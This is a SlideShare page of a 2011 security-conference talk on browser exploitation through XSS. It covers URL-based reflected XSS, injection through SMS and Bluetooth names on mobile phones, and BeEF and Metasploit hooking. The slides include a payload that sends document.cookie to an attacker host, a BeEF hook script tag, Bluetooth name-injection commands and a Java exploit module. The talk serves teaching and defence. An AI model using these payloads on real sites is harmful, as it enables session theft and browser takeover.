SlideShare a Scribd company logo

Raúl Siles - Browser Exploitation for Fun and Profit Revolutions [RootedCON 2011]

RootedCON
RootedCON
Technology
1 of 29
Download to read offline
www.taddong.com Browser Exploitation for Fun and Profit Revolutions (…in less than 24 hours ) Raúl Siles raul@taddong.com March 4, 2011 Copyright © 2011 Taddong S.L. All rights reserved.
Outline •  On previous episodes… (3rd on the series) •  XSS state-of-the-art (≈ WCI) •  “New” kind of XSS: –  Global (or URL-based) non-persistent XSS •  Multi-technology WCI on mobile devices •  Browser exploitation through XSS –  BeEF + Metasploit + attacker’s imagination •  References Copyright © 2011 Taddong S.L. www.taddong.com 2
On Previous Episodes… •  “Browser Exploitation for Fun & Profit” –  Target: Web browser (& its plug-ins) –  Web application pen-tester setup & Demos –  Samurai WTF & BeEF & Metasploit http://blog.taddong.com/2010/11/browser-exploitation-for-fun-profit.html •  “Browser Exploitation for Fun & Profit Reloaded” –  Top vuln applications 2010: Java & Adobe –  Updating to the Ruby-based BeEF version –  Web browsing best practices http://blog.taddong.com/2010/12/browser-exploitation-for-fun-profit.html Copyright © 2011 Taddong S.L. www.taddong.com 3
XSS State-of-the-Art Copyright © 2011 Taddong S.L. www.taddong.com 4
Can My Browser Be Attacked? •  You only need to visit a single malicious web page… and be vulnerable to a single flaw… on your web browser or any of the installed plug-ins or add-ons… and … Trusted websites attacking you •  Drive-by-XSS Lots of attack vectors… such as XSS Copyright © 2011 Taddong S.L. www.taddong.com 5
Cross-Site Scripting (XSS) •  XSS (JavaScript) –  Why not “web content injection” (WCI)? –  Others: HTML, images, Java, Flash, ActiveX… •  XSS types –  Non-persistent & Persistent & … •  Risk/Impact perception: Low –  Industry & pen-tests Copyright © 2011 Taddong S.L. www.taddong.com 6
Who is (not) vulnerable to XSS? xssed.com Copyright © 2011 Taddong S.L. www.taddong.com 7
“New” kind of XSS: Global (or URL-based) Non-Persistent XSS Copyright © 2011 Taddong S.L. www.taddong.com 8
Traditional XSS Protections •  Enforce input validation and output encoding –  GET & POST parameters –  HTTP headers GET /portal?lang=es&q=rootedcon&year=2011 HTTP/1.1 Host: www.example.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.14) Gecko/20110218 Firefox/3.6.14 Accept: text/html,application/xhtml+xml,application/ xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate Referer: http://www.example.com/main ... Copyright © 2011 Taddong S.L. www.taddong.com 9
Target Web Application •  Initially discovered during a real web application pen-test in Spain •  Multi-language support web-app –  Top HTML header includes links to the other languages (on every web page): URL https://www.example.com/portal/ […params] <UL class=cabecera_idiomas> <LI><a href="https://www.example.com/portal/?lang=es"> Bienvenidos</a></LI> <LI><a href="https://www.example.com/portal/?lang=en"> Welcome</a></LI> ...</UL> Copyright © 2011 Taddong S.L. www.taddong.com 10
Global (or URL-based) non- persistent XSS (1) •  HTML or script injection after the “?” without parameters https://www.example.com/portal/?"><script> document.location='https://www.attacker.com/triqui.php? c='+document.cookie</script> •  The script is reflected N-times on the web page received as the response –  One per language (by default) •  Similar scenario before the “?” (URL) or between parameters Copyright © 2011 Taddong S.L. www.taddong.com 11
Global (or URL-based) non- persistent XSS (2) •  Global: All web application resources (URLs) are vulnerable to XSS –  Not a specific HTTP parameter –  Better for: •  Obfuscation (long URLs) •  Social engineering •  More damaging attacks (e.g. web login page) •  Defenses: input validation and output encoding on everything (including the URL) Copyright © 2011 Taddong S.L. www.taddong.com 12
Multi-technology WCI (≈XSS) on Mobile Devices Copyright © 2011 Taddong S.L. www.taddong.com 13
XSS Everywhere •  XSS: the input is reflected on the output –  Immediately or “somewhere in time” •  Any input is a potential vulnerable candidate, as well as any output •  Web content injection (≈XSS) through multiple technologies on mobile devices –  SMS and Bluetooth What about… Wi-Fi, 2G/3G, etc? (network name) Copyright © 2011 Taddong S.L. www.taddong.com 14
SMS •  Initially discovered on Palm WebOS –  Open web sites, download files, install new root CA certs, turn off radio, or wipe device •  Extended to Windows Mobile & HTC –  Web-based SMS preview capabilities on HTC Windows Mobile smart-phones (scripting) •  http://www.securityfocus.com/archive/1/510897/30/ •  Defenses: Disable preview or update http://intrepidusgroup.com/insight/webos/ Copyright © 2011 Taddong S.L. www.taddong.com 15
SMS on Windows Mobile 6.5 From: 666123666 To: 6001234567 Mensaje (SMS): <script>alert ('Ejecucion de Javascript')</ script> Copyright © 2011 Taddong S.L. www.taddong.com 16
Bluetooth •  Discovered on Windows Mobile 6.1 –  Native web-based GUI notification subsystem •  Bluetooth pairing and profile access –  Bluetooth authorization message (<=32 chars) –  Only HTML (no scripting): Blueline attacks •  Defenses: Customized notification subsystem (vendor based) http://www.hackingexposedwireless.com Copyright © 2011 Taddong S.L. www.taddong.com 17
Bluetooth on Windows Mobile 6.1 # hciconfig hci0 name "<b>Ordenador</b> no peligro<i>so</i>" # hciconfig hci0 name "Mantener Bluetooth activo?<br><p" Copyright © 2011 Taddong S.L. www.taddong.com 18
Root Cause of the Problem •  Web contents everywhere (or converted to) •  Information displayed (GUI) via a web- based engine (HTML, JavaScript & more) Databases Web-App Copyright © 2011 Taddong S.L. www.taddong.com 19
Near Future Vulnerable Inputs •  Camera: Barcode or QR code reader, etc •  Microphone: HTML-based audio transcript Copyright © 2011 Taddong S.L. www.taddong.com 20
Browser Exploitation through XSS Copyright © 2011 Taddong S.L. www.taddong.com 21
Demonstrating XSS •  Most common example:  –  Quick for XSS discovery but… <script>alert(‘XSS’)</script> How to contribute to change this general perception? Copyright © 2011 Taddong S.L. www.taddong.com 22
Live Demo Copyright © 2011 Taddong S.L. www.taddong.com 23
Exploiting Java CVE-2010-0886 •  All vulnerability details are on previous episodes –  Java 6 Update (10 =< x <= 19) •  “Do you know Rubén Santamarta?”  •  Exploit requirements: –  Metasploit running as root (sudo) –  SMB not running on pen-tester system –  WebClient (WebDAV Mini-Redirector) running on target (by default) –  WEBDAV requires SRVPORT=80 and URIPATH=/ (BeEF is running there!! Use != IP addresses) exploit/windows/browser/java_ws_arginject_altjvm Copyright © 2011 Taddong S.L. www.taddong.com 24
BeEF Exploitation •  This is the only script the attacker needs to inject in the target web application: (PHP) <script src="http://www.attacker.com/ beef/hook/beefmagic.js"></script> •  Metasploit integration •  Persistent hooking (100% iframe) –  URL limitation (& favicon) – Yori Kvitchko –  Not in some mobile devices… Copyright © 2011 Taddong S.L. www.taddong.com 25
Persistent Hooking in Mobile Devices through URL hiding •  URL hiding or addr. bar replacement •  UI spoofing Safari on the iPhone –  JavaScript pushes real address bar up •  Android too http://evil-lemur.com/mobile/ http://software-security.sans.org/blog/2010/11/29/ui- spoofing-safari-iphone Copyright © 2011 Taddong S.L. www.taddong.com 26
References •  Presentations in the Browser Exploitation for Fun & Profit Series: http://blog.taddong.com •  Samurai WTF (Web Testing Framework): –  http://sourceforge.net/projects/samurai/ •  BeEF –  http://www.bindshell.net/tools/beef/ –  https://code.google.com/p/beef/ •  MetaSploit Framework (MSF): (autopwn) –  http://www.metasploit.com –  http://www.metasploit.com/framework/modules/ Copyright © 2011 Taddong S.L. www.taddong.com 27
Questions?  Copyright © 2011 Taddong S.L. www.taddong.com 28
www.taddong.com Blog: blog.taddong.com Twitter: @taddong raul@taddong.com

Recommended

Joxean Koret - Database Security Paradise [Rooted CON 2011]
Joxean Koret - Database Security Paradise [Rooted CON 2011]Joxean Koret - Database Security Paradise [Rooted CON 2011]
Joxean Koret - Database Security Paradise [Rooted CON 2011]RootedCON
 
Wtf is happening_inside_my_android_phone_public
Wtf is happening_inside_my_android_phone_publicWtf is happening_inside_my_android_phone_public
Wtf is happening_inside_my_android_phone_publicJaime Blasco
 
Breaking Vaults - Stealing Lastpass Protected Secrets by Martin Vigo
Breaking Vaults - Stealing Lastpass Protected Secrets by Martin VigoBreaking Vaults - Stealing Lastpass Protected Secrets by Martin Vigo
Breaking Vaults - Stealing Lastpass Protected Secrets by Martin VigoShakacon
 
Threat stack aws
Threat stack awsThreat stack aws
Threat stack awsJen Andre
 
Hacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan BalazsHacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan BalazsShakacon
 
Sheila Ayelen Berta - The Art of Persistence: "Mr. Windows… I don’t wanna go ...
Sheila Ayelen Berta - The Art of Persistence: "Mr. Windows… I don’t wanna go ...Sheila Ayelen Berta - The Art of Persistence: "Mr. Windows… I don’t wanna go ...
Sheila Ayelen Berta - The Art of Persistence: "Mr. Windows… I don’t wanna go ...RootedCON
 
Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)
Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)
Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)Rob Fuller
 
Passwords#14 - mimikatz
Passwords#14 - mimikatzPasswords#14 - mimikatz
Passwords#14 - mimikatzBenjamin Delpy
 

Recommended

Joxean Koret - Database Security Paradise [Rooted CON 2011]
Joxean Koret - Database Security Paradise [Rooted CON 2011]Joxean Koret - Database Security Paradise [Rooted CON 2011]
Joxean Koret - Database Security Paradise [Rooted CON 2011]RootedCON
 
Wtf is happening_inside_my_android_phone_public
Wtf is happening_inside_my_android_phone_publicWtf is happening_inside_my_android_phone_public
Wtf is happening_inside_my_android_phone_publicJaime Blasco
 
Breaking Vaults - Stealing Lastpass Protected Secrets by Martin Vigo
Breaking Vaults - Stealing Lastpass Protected Secrets by Martin VigoBreaking Vaults - Stealing Lastpass Protected Secrets by Martin Vigo
Breaking Vaults - Stealing Lastpass Protected Secrets by Martin VigoShakacon
 
Threat stack aws
Threat stack awsThreat stack aws
Threat stack awsJen Andre
 
Hacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan BalazsHacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan BalazsShakacon
 
Sheila Ayelen Berta - The Art of Persistence: "Mr. Windows… I don’t wanna go ...
Sheila Ayelen Berta - The Art of Persistence: "Mr. Windows… I don’t wanna go ...Sheila Ayelen Berta - The Art of Persistence: "Mr. Windows… I don’t wanna go ...
Sheila Ayelen Berta - The Art of Persistence: "Mr. Windows… I don’t wanna go ...RootedCON
 
Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)
Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)
Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)Rob Fuller
 
Passwords#14 - mimikatz
Passwords#14 - mimikatzPasswords#14 - mimikatz
Passwords#14 - mimikatzBenjamin Delpy
 
How to hide your browser 0-day @ Disobey
How to hide your browser 0-day @ DisobeyHow to hide your browser 0-day @ Disobey
How to hide your browser 0-day @ DisobeyZoltan Balazs
 
Francisco Jesús Gómez + Carlos Juan Diaz - Cloud Malware Distribution: DNS wi...
Francisco Jesús Gómez + Carlos Juan Diaz - Cloud Malware Distribution: DNS wi...Francisco Jesús Gómez + Carlos Juan Diaz - Cloud Malware Distribution: DNS wi...
Francisco Jesús Gómez + Carlos Juan Diaz - Cloud Malware Distribution: DNS wi...RootedCON
 
Automated Malware Analysis and Cyber Security Intelligence
Automated Malware Analysis and Cyber Security IntelligenceAutomated Malware Analysis and Cyber Security Intelligence
Automated Malware Analysis and Cyber Security IntelligenceJason Choi
 
Codetainer: a Docker-based browser code 'sandbox'
Codetainer: a Docker-based browser code 'sandbox'Codetainer: a Docker-based browser code 'sandbox'
Codetainer: a Docker-based browser code 'sandbox'Jen Andre
 
"A rootkits writer’s guide to defense" - Michal Purzynski
"A rootkits writer’s guide to defense" - Michal Purzynski"A rootkits writer’s guide to defense" - Michal Purzynski
"A rootkits writer’s guide to defense" - Michal PurzynskiPROIDEA
 
Think Like a Hacker - Database Attack Vectors
Think Like a Hacker - Database Attack VectorsThink Like a Hacker - Database Attack Vectors
Think Like a Hacker - Database Attack VectorsMark Ginnebaugh
 
44CON 2014 - Breaking AV Software
44CON 2014 - Breaking AV Software44CON 2014 - Breaking AV Software
44CON 2014 - Breaking AV Software44CON
 
"Revenge of The Script Kiddies: Current Day Uses of Automated Scripts by Top ...
"Revenge of The Script Kiddies: Current Day Uses of Automated Scripts by Top ..."Revenge of The Script Kiddies: Current Day Uses of Automated Scripts by Top ...
"Revenge of The Script Kiddies: Current Day Uses of Automated Scripts by Top ...PROIDEA
 
Defcon 22-colby-moore-patrick-wardle-synack-drop cam
Defcon 22-colby-moore-patrick-wardle-synack-drop camDefcon 22-colby-moore-patrick-wardle-synack-drop cam
Defcon 22-colby-moore-patrick-wardle-synack-drop camPriyanka Aash
 
Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valero
Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valeroRooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valero
Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valeroRootedCON
 
Richard wartell malware is hard. let's go shopping!!
Richard wartell malware is hard. let's go shopping!!Richard wartell malware is hard. let's go shopping!!
Richard wartell malware is hard. let's go shopping!!Shakacon
 
Indicators of compromise: From malware analysis to eradication
Indicators of compromise: From malware analysis to eradicationIndicators of compromise: From malware analysis to eradication
Indicators of compromise: From malware analysis to eradicationMichael Boman
 
"Powershell kung-fu" - Paweł Maziarz
"Powershell kung-fu" - Paweł Maziarz"Powershell kung-fu" - Paweł Maziarz
"Powershell kung-fu" - Paweł MaziarzPROIDEA
 
How to drive a malware analyst crazy
How to drive a malware analyst crazyHow to drive a malware analyst crazy
How to drive a malware analyst crazyMichael Boman
 
Nikto
NiktoNikto
NiktoSorina Chirilă
 
Socially Acceptable Methods to Walk in the Front Door
Socially Acceptable Methods to Walk in the Front DoorSocially Acceptable Methods to Walk in the Front Door
Socially Acceptable Methods to Walk in the Front DoorMike Felch
 
The day I ruled the world (RootedCON 2020)
The day I ruled the world (RootedCON 2020)The day I ruled the world (RootedCON 2020)
The day I ruled the world (RootedCON 2020)Javier Junquera
 
Abusing Microsoft Kerberos - Sorry you guys don't get it
Abusing Microsoft Kerberos - Sorry you guys don't get itAbusing Microsoft Kerberos - Sorry you guys don't get it
Abusing Microsoft Kerberos - Sorry you guys don't get itBenjamin Delpy
 
Why isn't infosec working? Did you turn it off and back on again?
Why isn't infosec working? Did you turn it off and back on again?Why isn't infosec working? Did you turn it off and back on again?
Why isn't infosec working? Did you turn it off and back on again?Rob Fuller
 
Масштабируемый и эффективный фаззинг Google Chrome
Масштабируемый и эффективный фаззинг Google ChromeМасштабируемый и эффективный фаззинг Google Chrome
Масштабируемый и эффективный фаззинг Google ChromePositive Hack Days
 
David Pérez + José Picó - Un ataque práctico contra comunicaciones móviles [R...
David Pérez + José Picó - Un ataque práctico contra comunicaciones móviles [R...David Pérez + José Picó - Un ataque práctico contra comunicaciones móviles [R...
David Pérez + José Picó - Un ataque práctico contra comunicaciones móviles [R...RootedCON
 
Gianluca D'Antonio - La Gestión de la Seguridad de la Información ante las nu...
Gianluca D'Antonio - La Gestión de la Seguridad de la Información ante las nu...Gianluca D'Antonio - La Gestión de la Seguridad de la Información ante las nu...
Gianluca D'Antonio - La Gestión de la Seguridad de la Información ante las nu...RootedCON
 

More Related Content

What's hot

How to hide your browser 0-day @ Disobey
How to hide your browser 0-day @ DisobeyHow to hide your browser 0-day @ Disobey
How to hide your browser 0-day @ DisobeyZoltan Balazs
 
Francisco Jesús Gómez + Carlos Juan Diaz - Cloud Malware Distribution: DNS wi...
Francisco Jesús Gómez + Carlos Juan Diaz - Cloud Malware Distribution: DNS wi...Francisco Jesús Gómez + Carlos Juan Diaz - Cloud Malware Distribution: DNS wi...
Francisco Jesús Gómez + Carlos Juan Diaz - Cloud Malware Distribution: DNS wi...RootedCON
 
Automated Malware Analysis and Cyber Security Intelligence
Automated Malware Analysis and Cyber Security IntelligenceAutomated Malware Analysis and Cyber Security Intelligence
Automated Malware Analysis and Cyber Security IntelligenceJason Choi
 
Codetainer: a Docker-based browser code 'sandbox'
Codetainer: a Docker-based browser code 'sandbox'Codetainer: a Docker-based browser code 'sandbox'
Codetainer: a Docker-based browser code 'sandbox'Jen Andre
 
"A rootkits writer’s guide to defense" - Michal Purzynski
"A rootkits writer’s guide to defense" - Michal Purzynski"A rootkits writer’s guide to defense" - Michal Purzynski
"A rootkits writer’s guide to defense" - Michal PurzynskiPROIDEA
 
Think Like a Hacker - Database Attack Vectors
Think Like a Hacker - Database Attack VectorsThink Like a Hacker - Database Attack Vectors
Think Like a Hacker - Database Attack VectorsMark Ginnebaugh
 
44CON 2014 - Breaking AV Software
44CON 2014 - Breaking AV Software44CON 2014 - Breaking AV Software
44CON 2014 - Breaking AV Software44CON
 
"Revenge of The Script Kiddies: Current Day Uses of Automated Scripts by Top ...
"Revenge of The Script Kiddies: Current Day Uses of Automated Scripts by Top ..."Revenge of The Script Kiddies: Current Day Uses of Automated Scripts by Top ...
"Revenge of The Script Kiddies: Current Day Uses of Automated Scripts by Top ...PROIDEA
 
Defcon 22-colby-moore-patrick-wardle-synack-drop cam
Defcon 22-colby-moore-patrick-wardle-synack-drop camDefcon 22-colby-moore-patrick-wardle-synack-drop cam
Defcon 22-colby-moore-patrick-wardle-synack-drop camPriyanka Aash
 
Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valero
Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valeroRooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valero
Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valeroRootedCON
 
Richard wartell malware is hard. let's go shopping!!
Richard wartell malware is hard. let's go shopping!!Richard wartell malware is hard. let's go shopping!!
Richard wartell malware is hard. let's go shopping!!Shakacon
 
Indicators of compromise: From malware analysis to eradication
Indicators of compromise: From malware analysis to eradicationIndicators of compromise: From malware analysis to eradication
Indicators of compromise: From malware analysis to eradicationMichael Boman
 
"Powershell kung-fu" - Paweł Maziarz
"Powershell kung-fu" - Paweł Maziarz"Powershell kung-fu" - Paweł Maziarz
"Powershell kung-fu" - Paweł MaziarzPROIDEA
 
How to drive a malware analyst crazy
How to drive a malware analyst crazyHow to drive a malware analyst crazy
How to drive a malware analyst crazyMichael Boman
 
Socially Acceptable Methods to Walk in the Front Door
Socially Acceptable Methods to Walk in the Front DoorSocially Acceptable Methods to Walk in the Front Door
Socially Acceptable Methods to Walk in the Front DoorMike Felch
 
The day I ruled the world (RootedCON 2020)
The day I ruled the world (RootedCON 2020)The day I ruled the world (RootedCON 2020)
The day I ruled the world (RootedCON 2020)Javier Junquera
 
Abusing Microsoft Kerberos - Sorry you guys don't get it
Abusing Microsoft Kerberos - Sorry you guys don't get itAbusing Microsoft Kerberos - Sorry you guys don't get it
Abusing Microsoft Kerberos - Sorry you guys don't get itBenjamin Delpy
 
Why isn't infosec working? Did you turn it off and back on again?
Why isn't infosec working? Did you turn it off and back on again?Why isn't infosec working? Did you turn it off and back on again?
Why isn't infosec working? Did you turn it off and back on again?Rob Fuller
 
Масштабируемый и эффективный фаззинг Google Chrome
Масштабируемый и эффективный фаззинг Google ChromeМасштабируемый и эффективный фаззинг Google Chrome
Масштабируемый и эффективный фаззинг Google ChromePositive Hack Days
 

What's hot (20)

How to hide your browser 0-day @ Disobey
How to hide your browser 0-day @ DisobeyHow to hide your browser 0-day @ Disobey
How to hide your browser 0-day @ Disobey
 
Francisco Jesús Gómez + Carlos Juan Diaz - Cloud Malware Distribution: DNS wi...
Francisco Jesús Gómez + Carlos Juan Diaz - Cloud Malware Distribution: DNS wi...Francisco Jesús Gómez + Carlos Juan Diaz - Cloud Malware Distribution: DNS wi...
Francisco Jesús Gómez + Carlos Juan Diaz - Cloud Malware Distribution: DNS wi...
 
Automated Malware Analysis and Cyber Security Intelligence
Automated Malware Analysis and Cyber Security IntelligenceAutomated Malware Analysis and Cyber Security Intelligence
Automated Malware Analysis and Cyber Security Intelligence
 
Codetainer: a Docker-based browser code 'sandbox'
Codetainer: a Docker-based browser code 'sandbox'Codetainer: a Docker-based browser code 'sandbox'
Codetainer: a Docker-based browser code 'sandbox'
 
"A rootkits writer’s guide to defense" - Michal Purzynski
"A rootkits writer’s guide to defense" - Michal Purzynski"A rootkits writer’s guide to defense" - Michal Purzynski
"A rootkits writer’s guide to defense" - Michal Purzynski
 
Think Like a Hacker - Database Attack Vectors
Think Like a Hacker - Database Attack VectorsThink Like a Hacker - Database Attack Vectors
Think Like a Hacker - Database Attack Vectors
 
44CON 2014 - Breaking AV Software
44CON 2014 - Breaking AV Software44CON 2014 - Breaking AV Software
44CON 2014 - Breaking AV Software
 
"Revenge of The Script Kiddies: Current Day Uses of Automated Scripts by Top ...
"Revenge of The Script Kiddies: Current Day Uses of Automated Scripts by Top ..."Revenge of The Script Kiddies: Current Day Uses of Automated Scripts by Top ...
"Revenge of The Script Kiddies: Current Day Uses of Automated Scripts by Top ...
 
Defcon 22-colby-moore-patrick-wardle-synack-drop cam
Defcon 22-colby-moore-patrick-wardle-synack-drop camDefcon 22-colby-moore-patrick-wardle-synack-drop cam
Defcon 22-colby-moore-patrick-wardle-synack-drop cam
 
Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valero
Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valeroRooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valero
Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valero
 
Richard wartell malware is hard. let's go shopping!!
Richard wartell malware is hard. let's go shopping!!Richard wartell malware is hard. let's go shopping!!
Richard wartell malware is hard. let's go shopping!!
 
Indicators of compromise: From malware analysis to eradication
Indicators of compromise: From malware analysis to eradicationIndicators of compromise: From malware analysis to eradication
Indicators of compromise: From malware analysis to eradication
 
"Powershell kung-fu" - Paweł Maziarz
"Powershell kung-fu" - Paweł Maziarz"Powershell kung-fu" - Paweł Maziarz
"Powershell kung-fu" - Paweł Maziarz
 
How to drive a malware analyst crazy
How to drive a malware analyst crazyHow to drive a malware analyst crazy
How to drive a malware analyst crazy
 
Nikto
NiktoNikto
Nikto
 
Socially Acceptable Methods to Walk in the Front Door
Socially Acceptable Methods to Walk in the Front DoorSocially Acceptable Methods to Walk in the Front Door
Socially Acceptable Methods to Walk in the Front Door
 
The day I ruled the world (RootedCON 2020)
The day I ruled the world (RootedCON 2020)The day I ruled the world (RootedCON 2020)
The day I ruled the world (RootedCON 2020)
 
Abusing Microsoft Kerberos - Sorry you guys don't get it
Abusing Microsoft Kerberos - Sorry you guys don't get itAbusing Microsoft Kerberos - Sorry you guys don't get it
Abusing Microsoft Kerberos - Sorry you guys don't get it
 
Why isn't infosec working? Did you turn it off and back on again?
Why isn't infosec working? Did you turn it off and back on again?Why isn't infosec working? Did you turn it off and back on again?
Why isn't infosec working? Did you turn it off and back on again?
 
Масштабируемый и эффективный фаззинг Google Chrome
Масштабируемый и эффективный фаззинг Google ChromeМасштабируемый и эффективный фаззинг Google Chrome
Масштабируемый и эффективный фаззинг Google Chrome
 

Viewers also liked

David Pérez + José Picó - Un ataque práctico contra comunicaciones móviles [R...
David Pérez + José Picó - Un ataque práctico contra comunicaciones móviles [R...David Pérez + José Picó - Un ataque práctico contra comunicaciones móviles [R...
David Pérez + José Picó - Un ataque práctico contra comunicaciones móviles [R...RootedCON
 
Gianluca D'Antonio - La Gestión de la Seguridad de la Información ante las nu...
Gianluca D'Antonio - La Gestión de la Seguridad de la Información ante las nu...Gianluca D'Antonio - La Gestión de la Seguridad de la Información ante las nu...
Gianluca D'Antonio - La Gestión de la Seguridad de la Información ante las nu...RootedCON
 
Gabriel Gonzalez - Man-In-Remote: PKCS11 for fun and non-profit [RootedCON 2011]
Gabriel Gonzalez - Man-In-Remote: PKCS11 for fun and non-profit [RootedCON 2011]Gabriel Gonzalez - Man-In-Remote: PKCS11 for fun and non-profit [RootedCON 2011]
Gabriel Gonzalez - Man-In-Remote: PKCS11 for fun and non-profit [RootedCON 2011]RootedCON
 
Marisol Salanova - Seguridad informática y cibersexo [RootedCON 2011]
Marisol Salanova - Seguridad informática y cibersexo [RootedCON 2011]Marisol Salanova - Seguridad informática y cibersexo [RootedCON 2011]
Marisol Salanova - Seguridad informática y cibersexo [RootedCON 2011]RootedCON
 
Antonio Ramos - La asimetría en el mercado de la seguridad [RootedCON 2011]
Antonio Ramos - La asimetría en el mercado de la seguridad [RootedCON 2011]Antonio Ramos - La asimetría en el mercado de la seguridad [RootedCON 2011]
Antonio Ramos - La asimetría en el mercado de la seguridad [RootedCON 2011]RootedCON
 
{RootedPanel] Grupo de Hackers Históricos: Apòstols [RootedCON 2010]
{RootedPanel] Grupo de Hackers Históricos: Apòstols [RootedCON 2010]{RootedPanel] Grupo de Hackers Históricos: Apòstols [RootedCON 2010]
{RootedPanel] Grupo de Hackers Históricos: Apòstols [RootedCON 2010]RootedCON
 
Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]
Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]
Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]RootedCON
 
Jaime Peñalba - Como defenderse en terreno hostil: Protecciones para la Defco...
Jaime Peñalba - Como defenderse en terreno hostil: Protecciones para la Defco...Jaime Peñalba - Como defenderse en terreno hostil: Protecciones para la Defco...
Jaime Peñalba - Como defenderse en terreno hostil: Protecciones para la Defco...RootedCON
 
Alejandro Martín + Chema Alonso - Pulveriza tus publicaciones con Dust [Roote...
Alejandro Martín + Chema Alonso - Pulveriza tus publicaciones con Dust [Roote...Alejandro Martín + Chema Alonso - Pulveriza tus publicaciones con Dust [Roote...
Alejandro Martín + Chema Alonso - Pulveriza tus publicaciones con Dust [Roote...RootedCON
 
José Ramón Palanco - NoSQL Security [RootedCON 2011]
José Ramón Palanco - NoSQL Security [RootedCON 2011]José Ramón Palanco - NoSQL Security [RootedCON 2011]
José Ramón Palanco - NoSQL Security [RootedCON 2011]RootedCON
 
Rubén Santamarta - SCADA Trojans: Attacking the Grid [Rooted CON 2011]
Rubén Santamarta - SCADA Trojans: Attacking the Grid [Rooted CON 2011]Rubén Santamarta - SCADA Trojans: Attacking the Grid [Rooted CON 2011]
Rubén Santamarta - SCADA Trojans: Attacking the Grid [Rooted CON 2011]RootedCON
 
José Selvi - Unprivileged Network Post-Exploitation [RootedCON 2011]
José Selvi - Unprivileged Network Post-Exploitation [RootedCON 2011]José Selvi - Unprivileged Network Post-Exploitation [RootedCON 2011]
José Selvi - Unprivileged Network Post-Exploitation [RootedCON 2011]RootedCON
 
Blueliv - Information Tracking with Optos [Rooted CON 2011]
Blueliv - Information Tracking with Optos [Rooted CON 2011]Blueliv - Information Tracking with Optos [Rooted CON 2011]
Blueliv - Information Tracking with Optos [Rooted CON 2011]RootedCON
 
David López Paz - Global Warfare [RootedCON 2011]
David López Paz - Global Warfare [RootedCON 2011]David López Paz - Global Warfare [RootedCON 2011]
David López Paz - Global Warfare [RootedCON 2011]RootedCON
 
Vins Villaplana - Seguridad en capa de enlace [RootedCON 2011]
Vins Villaplana - Seguridad en capa de enlace [RootedCON 2011]Vins Villaplana - Seguridad en capa de enlace [RootedCON 2011]
Vins Villaplana - Seguridad en capa de enlace [RootedCON 2011]RootedCON
 
Sergi Álvarez + Roi Martín - radare2: From forensics to bindiffing [RootedCON...
Sergi Álvarez + Roi Martín - radare2: From forensics to bindiffing [RootedCON...Sergi Álvarez + Roi Martín - radare2: From forensics to bindiffing [RootedCON...
Sergi Álvarez + Roi Martín - radare2: From forensics to bindiffing [RootedCON...RootedCON
 
José Miguel Esparza - Obfuscation and (non-)detection of malicious PDF files ...
José Miguel Esparza - Obfuscation and (non-)detection of malicious PDF files ...José Miguel Esparza - Obfuscation and (non-)detection of malicious PDF files ...
José Miguel Esparza - Obfuscation and (non-)detection of malicious PDF files ...RootedCON
 
Jaime Blasco & Pablo Rincón - Lost in translation: WTF is happening inside m...
Jaime Blasco & Pablo Rincón - Lost in translation: WTF is happening inside m...Jaime Blasco & Pablo Rincón - Lost in translation: WTF is happening inside m...
Jaime Blasco & Pablo Rincón - Lost in translation: WTF is happening inside m...RootedCON
 
Hernan Ochoa - WCE Internals [RootedCON 2011]
Hernan Ochoa - WCE Internals [RootedCON 2011]Hernan Ochoa - WCE Internals [RootedCON 2011]
Hernan Ochoa - WCE Internals [RootedCON 2011]RootedCON
 
Eloi Sanfelix - Hardware security: Side Channel Attacks [RootedCON 2011]
Eloi Sanfelix - Hardware security: Side Channel Attacks [RootedCON 2011]Eloi Sanfelix - Hardware security: Side Channel Attacks [RootedCON 2011]
Eloi Sanfelix - Hardware security: Side Channel Attacks [RootedCON 2011]RootedCON
 

Viewers also liked (20)

David Pérez + José Picó - Un ataque práctico contra comunicaciones móviles [R...
David Pérez + José Picó - Un ataque práctico contra comunicaciones móviles [R...David Pérez + José Picó - Un ataque práctico contra comunicaciones móviles [R...
David Pérez + José Picó - Un ataque práctico contra comunicaciones móviles [R...
 
Gianluca D'Antonio - La Gestión de la Seguridad de la Información ante las nu...
Gianluca D'Antonio - La Gestión de la Seguridad de la Información ante las nu...Gianluca D'Antonio - La Gestión de la Seguridad de la Información ante las nu...
Gianluca D'Antonio - La Gestión de la Seguridad de la Información ante las nu...
 
